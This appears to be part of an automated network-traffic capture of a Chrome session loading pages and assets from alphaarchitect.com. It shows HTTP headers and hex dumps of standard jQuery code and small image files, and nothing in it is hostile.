                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6c 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74
                                                                                                                                                                                                                                                                        Data Ascii: unction(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];ret
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 3d 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 74 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 67 65 2b 22 3f 7c 5c 5c 5c 5c 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 7c 5b 5c 5c 77 2d 5d 7c 5b 5e 5c 30 2d 5c 5c
                                                                                                                                                                                                                                                                        Data Ascii: =W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",t="(?:\\\\[\\da-fA-F]{1,6}"+ge+"?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c 22 66 69 65 6c 64 73 65 74 22 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 6b 2e 61 70 70 6c 79 28 6f 65 3d 61 65 2e 63 61 6c 6c 28 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 6f 65 5b 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64
                                                                                                                                                                                                                                                                        Data Ascii: harCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,"fieldset")},{dir:"parentNode",next:"legend"});try{k.apply(oe=ae.call(ye.childNodes),ye.childNodes),oe[ye.childNodes.length].nod
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e
                                                                                                                                                                                                                                                                        Data Ascii: h&&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function B(t){return function(e){return fe(e,"in
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 7b 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 43 29 7b 76 61 72 20 6e 3d
                                                                                                                                                                                                                                                                        Data Ascii: {try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&C){var n=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 64 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70
                                                                                                                                                                                                                                                                        Data Ascii: length||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),r.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&d.push(":enabled",":disabled"),(t=T.createElement("inp
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 62 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 30 2c 69 3d 30 3b 69 66 28 61 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 2c 6f 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 26 26 61 65 2e 63 61 6c 6c 28 65 2c 30 29 2c 64 65 2e 63 61 6c 6c 28 65 2c 6c 29 2c 61 29 7b 77 68 69 6c 65 28 74 3d 65 5b 69 2b 2b 5d 29 74 3d 3d 3d 65 5b 69 5d 26 26 28 72 3d 6e 2e 70 75 73 68 28 69 29 29 3b 77 68 69 6c 65 28 72 2d 2d 29 68 65 2e
                                                                                                                                                                                                                                                                        Data Ascii: bute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[],r=0,i=0;if(a=!le.sortStable,o=!le.sortStable&&ae.call(e,0),de.call(e,l),a){while(t=e[i++])t===e[i]&&(r=n.push(i));while(r--)he.


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.44975089.35.237.1704435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC627OUTGET /buttons/printfriendly-pdf-button-nobg-md.png HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cdn.printfriendly.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-20 12:44:42 UTC1069INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:41 GMT
                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                        Content-Length: 1597
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Server: BunnyCDN-RI1-892
                                                                                                                                                                                                                                                                        CDN-PullZone: 29989
                                                                                                                                                                                                                                                                        CDN-Uid: c46cf0ce-de12-43ee-84e2-564af22e66fd
                                                                                                                                                                                                                                                                        CDN-RequestCountryCode: US
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Type
                                                                                                                                                                                                                                                                        Age: 1371
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=10800
                                                                                                                                                                                                                                                                        ETag: "4fa09b16d257ef2d09ffbafc25a2049c"
                                                                                                                                                                                                                                                                        Last-Modified: Wed, 04 Oct 2017 08:48:28 GMT
                                                                                                                                                                                                                                                                        x-goog-generation: 1507106908408014
                                                                                                                                                                                                                                                                        x-goog-metageneration: 2
                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 1597
                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=wAZd1Q==
                                                                                                                                                                                                                                                                        x-goog-hash: md5=T6CbFtJX7y0J/7r8JaIEnA==
                                                                                                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AHmUCY1DUu7lpKlaIjtosozspkEM354ROWI1OieKX2G0t4XiQ7GPmsKy2NRZp86h9bZ6x45_IyjO1g9Q5Q
                                                                                                                                                                                                                                                                        CDN-ProxyVer: 1.05
                                                                                                                                                                                                                                                                        CDN-RequestPullSuccess: True
                                                                                                                                                                                                                                                                        CDN-RequestPullCode: 200
                                                                                                                                                                                                                                                                        CDN-CachedAt: 10/28/2024 09:04:04
                                                                                                                                                                                                                                                                        CDN-EdgeStorageId: 892
                                                                                                                                                                                                                                                                        CDN-Status: 200
                                                                                                                                                                                                                                                                        CDN-RequestTime: 1
                                                                                                                                                                                                                                                                        CDN-RequestId: 68e110e0c2421230fda9a88f3a36f18f
                                                                                                                                                                                                                                                                        CDN-Cache: HIT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        2024-12-20 12:44:42 UTC1597INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7c 00 00 00 1e 08 06 00 00 00 ee 22 7a ef 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 f4 49 44 41 54 68 05 ed 58 6b 4c 5c 45 14 9e bb bb b0 5b 40 9b 50 15 36 4b 4b da 9f 42 a1 f5 45 ac af 84 c4 1f da 9a f8 a0 46 13 6d ec 9f 82 89 05 43 4c 58 40 22 8a e0 62 23 92 ad 55 52 6b 63 6a 53 cd 36 a8 4d ac f8 43 c1 96 d6 62 52 69 a0 82 a9 a8 3f da ae 80 36 94 f7 ee c2 3e fc e6 ae 4b 66 6f ee 5e e6 f6 f2 58 cd dc 64 98 33 67 ce 39 73 ce f9 e6 cc cc 42 88 f8 44 06 44 06 44 06 44 06 44 06 44 06 44 06 44 06 92 3e 03 92 51 0f 77 7a f2 52 bd 26 6f 99 45 8a 94 85 c2 64 53 28 44 ac 6a 36 7b 9e 99 30 bc 96 9a dd 15 e2 39 0d ac e3 32 a0 bb e4 aa 16 23 16 ef f5 ac 73 8c 98 ae 76 65 ad 95 ec f9 b9 a6 8c 75
                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR|"zgAMAaIDAThXkL\E[@P6KKBEFmCLX@"b#URkcjS6MCbRi?6>Kfo^Xd3g9sBDDDDDDDD>QwzR&oEdS(Dj6{092#sveu


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.449751141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:42 UTC839OUTGET /wp-content/uploads/2019/12/santa-logo-e1577124084176.png HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC553INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:43 GMT
                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                        Content-Length: 6028
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                                                        Cf-Polished: origFmt=png, origSize=9009
                                                                                                                                                                                                                                                                        Content-Disposition: inline; filename="santa-logo-e1577124084176.webp"
                                                                                                                                                                                                                                                                        ETag: "632c27ff-2331"
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 22 Sep 2022 09:16:47 GMT
                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147801
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9b23e7c425c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC816INData Raw: 52 49 46 46 84 17 00 00 57 45 42 50 56 50 38 4c 77 17 00 00 2f fa c0 18 10 4d 38 6c db 46 92 60 7b ee b5 d2 7f c1 fb dc 5c 07 11 fd 9f 00 1d 23 69 ed 3e 24 33 d1 1f aa 64 12 6f 96 f4 b6 92 a4 db 52 ad a5 19 76 f5 a8 e5 6d 30 5a 36 1d ac 9b b7 92 62 e8 29 18 01 76 b1 31 26 36 09 d8 75 5b d3 13 43 01 63 9b da 6d cb 41 ad d4 56 42 08 0c e9 b2 dd 53 eb 57 24 b5 aa af b7 fc 77 a1 a0 6d 23 c7 fc 69 df fd b8 01 60 e0 d9 44 b6 ed 64 05 20 e2 a9 c0 bf 04 86 8a 32 e7 1c eb fe 4f 00 22 25 25 35 2d 23 2a 29 28 29 29 69 c9 2b e8 29 29 29 29 99 2b 98 39 39 39 c1 fe cf 90 b8 79 39 c9 38 3f 49 00 4c 25 50 a2 56 e0 07 54 01 89 c4 48 8c 7f c8 bf 5d d6 ad 2b 0e c5 6d db 38 d2 fe 6b a7 5d 7d 47 c4 04 10 aa 2c 34 5e 40 b4 10 16 01 ac 20 55 96 ea aa 9f c7 6e 6d db 2b b7 6d de
                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8Lw/M8lF`{\#i>$3doRvm0Z6b)v1&6u[CcmAVBSW$wm#i`Dd 2O"%%5-#*)())i+))))+999y98?IL%PVTH]+m8k]}G,4^@ Unm+m
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 3f a6 f0 3a 87 8c e3 d4 7c 32 83 5f 32 9a 64 4a 92 89 bd b5 45 b8 2d c3 7e 15 fc d4 12 20 b9 10 12 22 e1 42 20 84 1c bc f0 e3 51 4f 9f cb 27 be e3 9e 0c f9 ab e9 84 39 15 47 b1 17 07 0e dd 32 a8 06 52 c5 21 e8 da 4c 9e 60 dc 76 4b 8c 74 e1 b3 a6 cf 60 23 6b d8 7f 58 a6 2e e3 aa 13 a8 8b 29 17 bc a7 48 53 dd 92 21 3f 88 7e 00 f0 93 d8 ea f5 42 a1 2f 94 25 84 90 48 d3 92 3f 31 a4 45 1d 93 71 37 a4 e4 6b e1 1b a6 0c 90 c1 7b d6 b3 10 4a 09 9f 16 01 75 19 4c 5f a4 73 41 58 70 23 ee 27 ef 1e 0a 1e a6 e0 11 42 69 b8 4f a2 6f 9b ff 52 75 20 26 d6 89 9d 22 67 85 be 50 25 55 44 d5 93 83 4b e7 61 1b 6e b9 0b 8f 12 19 61 9b a2 05 63 5b 8c 2e 19 7b e1 e2 8e 97 2c 2c d9 2a 42 f3 67 f3 4f ba 66 77 ef 7d ee b3 fd 3f f7 2b 19 6a 04 c9 71 1c c9 16 da b2 f9 ed 53 7e bb 07
                                                                                                                                                                                                                                                                        Data Ascii: ?:|2_2dJE-~ "B QO'9G2R!L`vKt`#kX.)HS!?~B/%H?1Eq7k{JuL_sAXp#'BiOoRu &"gP%UDKanac[.{,,*BgOfw}?+jqS~
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 17 f6 79 06 a4 59 c3 3b f1 40 09 f4 6c 10 09 12 5f 09 91 1d 25 a5 89 bd 30 27 54 de 28 d8 2b 09 c7 05 2d 05 52 7a cd 24 b7 f6 7c 32 73 ef fa 07 db fc 0c bf df c2 1f 0a f5 23 b9 67 a2 08 33 c9 ad 95 0f 9a e5 f8 cf 40 64 b9 06 46 32 e2 cf 13 3c 61 46 f0 c2 a1 a3 4a 61 8f a4 e2 ba fe 87 2d ef e1 d7 4f c2 9f 3e 43 72 37 b4 ed 1f ff 48 ef 96 e6 90 db 0a e3 b9 d4 fb ad c8 42 c2 f8 d8 d1 ef 09 9e 73 53 2b 6c 55 87 df 11 56 bd 2c e0 3d e0 cd ab e1 e5 03 d0 16 4c 9b e6 d1 f0 95 c5 7f 65 e7 fe 99 9d f2 9e 75 32 42 70 65 9b ec d6 2b 0a 96 1b c2 94 87 d9 b2 c2 6f 80 37 6c 85 37 ef f8 dd 7e 78 b4 0e fd 04 5f 15 e1 d5 c0 73 ca 0b 53 ec 86 4d 91 a4 79 9a 60 c1 4f 7a 1e 7b ff 42 08 ae 3c 2e 89 c3 a4 d5 3b 37 68 02 43 29 6a 3a 03 48 8d f0 67 c2 cb 66 c3 cb e7 dc ef 38 81
                                                                                                                                                                                                                                                                        Data Ascii: yY;@l_%0'T(+-Rz$|2s#g3@dF2<aFJa-O>Cr7HBsS+lUV,=Leu2Bpe+o7l7~x_sSMy`Oz{B<.;7hC)j:Hgf8
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 1a 85 cc 3c 10 94 84 7c 34 6e d1 60 9e 95 2b 28 e7 d9 02 d1 61 a2 d9 4e 13 3e bd 65 bf 89 d7 6d f7 b9 d3 98 5f 9d 20 75 05 db 2f ea b5 1f da 96 d1 b9 ca 68 16 3e 0b 56 85 23 4a 85 5f c2 0d e1 bd a5 90 10 34 05 57 41 37 d1 47 b8 f5 4c 29 e0 2f cf 9d 90 85 30 2d bc 6d 4c 0f a8 fb 48 a0 d6 e7 4e 10 84 a8 bc ac 31 5d 58 80 e5 82 4f 42 f8 b6 8b a0 27 d8 5e dc d4 2c 3c 0e 43 4e a1 60 20 b0 20 26 3c 15 5e 95 2a 05 4f 11 5a 9e ff 96 90 75 7e 02 c8 2c a0 b6 79 ba e0 d0 0c 05 99 80 e0 66 80 c0 d7 4f 48 15 ea 84 35 42 f3 98 6b 0f 32 ed 42 82 aa 60 24 f0 c3 31 77 2f 37 98 3e a6 00 0a 32 01 e1 8d e1 04 6f 9e 81 26 04 39 21 e6 56 61 4a 61 b8 30 72 af b0 13 16 08 65 61 0d 3f d7 90 12 3a 04 a7 83 a2 06 01 df 7c 61 8f b0 7c 13 8a d5 42 e1 29 bc 50 70 69 0e 78 b2 85 b6 85
                                                                                                                                                                                                                                                                        Data Ascii: <|4n`+(aN>em_ u/h>V#J_4WA7GL)/0-mLHN1]XOB'^,<CN` &<^*OZu~,yfOH5Bk2B`$1w/7>2o&9!VaJa0rea?:|a|B)Ppix
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1105INData Raw: 00 f3 36 22 dc 5d 11 53 7a fc 39 ef 8f d5 e8 c7 8e c6 05 b3 9e 47 f9 e4 e9 23 b4 01 7e 2c 20 cf d0 b0 7a e0 a9 50 7f 3e fa 93 ba 16 13 cc 04 80 df 40 b5 61 60 26 02 40 c2 40 73 7f c1 d0 3f a1 78 38 44 07 42 a9 2b e2 11 bd 27 6c ba 6e 79 f4 e2 ca 3a e0 8e 9b 69 9e 54 7b 56 b0 3c da 08 86 60 02 a7 1a 00 fe 30 3d d1 0d 35 ec 7d 1f ce 3f 75 36 8e 67 8c 46 b3 37 42 eb 31 23 d7 fa 7b 9e 96 a7 a1 f0 f4 ff 2d 0e 09 2e 67 b0 76 16 5a 2b 37 11 17 92 06 94 99 b9 27 6c 56 f7 91 20 f4 d8 22 ce fe 52 3a 9b 97 2c d3 36 7d 6e ae 67 83 70 a2 38 b4 f7 b3 2b bd 43 9c f6 9f 77 f2 e4 8f b8 7c fa 8c 03 36 1d d1 33 f0 e2 c1 c3 fc 3d 8b e1 b2 44 c5 c4 e3 f4 66 61 77 55 62 fd 70 f4 fe 30 e3 4e 9a be 64 5e 3e bd 31 a0 c6 7c 22 e8 bc 71 03 0c 15 b1 66 5d 53 d3 e0 27 f2 8e 2a 8b f9
                                                                                                                                                                                                                                                                        Data Ascii: 6"]Sz9G#~, zP>@a`&@@s?x8DB+'lny:iT{V<`0=5}?u6gF7B1#{-.gvZ+7'lV "R:,6}ngp8+Cw|63=DfawUbp0Nd^>1|"qf]S'*


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.449752141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC554OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:43 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
